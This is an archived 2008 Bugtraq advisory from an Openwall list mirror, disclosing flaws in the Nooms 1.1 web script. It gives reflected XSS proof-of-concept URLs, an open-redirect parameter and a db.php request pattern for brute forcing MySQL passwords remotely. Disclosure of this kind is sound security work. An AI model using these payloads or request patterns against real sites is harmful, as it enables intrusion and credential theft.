lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 11 Sep 2008 06:24:24 -0600
From: irancrash@...il.com
To: bugtraq@...urityfocus.com
Subject: Nooms 1.1

----------------------------------------------------------------

Script : Nooms 1.1

Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access)

Risk : Medium

----------------------------------------------------------------

Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Mysql Remote Brute Force Vulnerability :


This is new type of the vulnerabilities .

I can't public Exploit of this vulnerability ,
But with this vulnerability attacker can brute force root and other user password with php in remote mode .

Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password]

----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script>

Xss 2 : http://Example/search.php?q="<script>alert('xss')</script>

----------------------------------------------------------------

Redirect Vulnerability :

Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]

----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ